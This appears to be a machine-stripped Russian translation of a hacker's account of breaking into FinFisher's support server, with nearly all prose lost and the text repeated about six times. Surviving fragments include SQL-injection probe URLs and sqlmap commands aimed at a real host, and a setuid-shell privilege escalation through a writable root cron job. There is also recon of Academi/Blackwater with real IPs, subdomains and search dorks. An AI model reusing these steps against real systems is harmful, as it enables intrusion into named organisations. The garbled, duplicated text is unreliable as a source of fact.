The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
